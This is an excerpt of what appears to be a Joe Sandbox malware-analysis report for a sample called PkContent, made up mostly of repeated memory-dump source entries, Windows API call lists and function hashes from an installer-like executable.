                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                      • String ID: HideWindow
                                                      • API String ID: 1249568736-780306582
                                                      • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                      • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                      • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                      • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                      • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                      • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                      • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                      • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                      APIs
                                                      • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                      • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree
                                                      • String ID:
                                                      • API String ID: 3394109436-0
                                                      • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                      • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                      • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                      • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                      • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                      • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                      APIs
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
